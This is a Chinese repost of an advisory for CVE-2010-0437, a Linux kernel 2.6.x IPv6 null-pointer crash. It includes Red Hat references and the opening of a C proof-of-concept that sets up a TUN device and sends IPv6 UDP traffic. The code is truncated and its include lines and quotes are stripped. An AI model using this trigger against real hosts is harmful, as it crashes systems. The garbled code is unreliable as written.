作者:铥铥宇900 | 来源:互联网 | 2017-11-13 02:33
影响版本:Linuxkernel2.6.x漏洞描述:CVE(CAN)ID:CVE-2010-0437LinuxKernel是开放源码操作系统Linux所使用的内核。LinuxKernel的ip6_dst_lookup_tail()函数中存在空指针引用漏洞。本地网络上的攻击者可以通过向目标系统发送IPv6通讯来触发这个漏洞,如果
影响版本:
Linux kernel 2.6.x漏洞描述:
CVE(CAN) ID: CVE-2010-0437
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的ip6_dst_lookup_tail()函数中存在空指针引用漏洞。本地网络上的攻击者可以通过向目标系统发送IPv6通讯来触发这个漏洞,如果接收到IPv6报文时目标系统上dst->neighbour为空,就会导致系统崩溃<*参考
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=563781
https://bugzilla.kernel.org/show_bug.cgi?format=multiple&id=11469
https://www.redhat.com/support/errata/RHSA-2010-0149.html
https://www.redhat.com/support/errata/RHSA-2010-0148.html
https://www.redhat.com/support/errata/RHSA-2010-0147.html
*>
测试方法:
[www.linuxso.com]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice is *
* retained and/or reproduced in the documentation provided with the *
* distribution. *
* *
* To the extent permitted by law, this software is provided with no *
* express or implied warranties of any kind. *
* The situation as regards scientific and technical know-how at the time *
* when this software was distributed did not enable all possible uses to be *
* tested and verified, nor for the presence of any or all faults to be *
* detected. In this respect, people’s attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software’s suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* The author does not warrant that this software does not infringe any or *
* all intellectual right relating to a patent, a design or a trademark. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#define _GNU_SOURCE 1
#include
#include
#include
#include
#include
#include
#include stat.h>
#include
#include
#include
#include
#include
#include
#include
static void run (const char *fmt, ...)
{
va_list ap;
char *cmd;
va_start (ap, fmt);
vasprintf (&cmd, fmt, ap);
va_end (ap);
system (cmd);
free (cmd);
}
static int tun_open (void)
{
struct ifreq req;
int fd = open (/dev/net/tun, O_RDWR);
if (fd == -1)
return -1;
memset (&req, 0, sizeof (req));
req.ifr_flags = IFF_TUN;
if (ioctl (fd, TUNSETIFF, &req))
{
(void) close (fd);
return -1;
}
run (ip link set dev %s up, req.ifr_name);
run (ip -6 address add fd34:5678:9abc:def0::1/64 dev %s,
req.ifr_name);
return fd;
}
static unsigned rcvd;
static int tun;
static void cleanup_fd (void *data)
{
(void) close ((intptr_t)data);
}
static void *thread (void *data)
{
unsigned n = (uintptr_t)data;
struct sockaddr_in6 dst;
uint16_t tunhead[2];
int fd = socket (PF_INET6, SOCK_DGRAM, 0);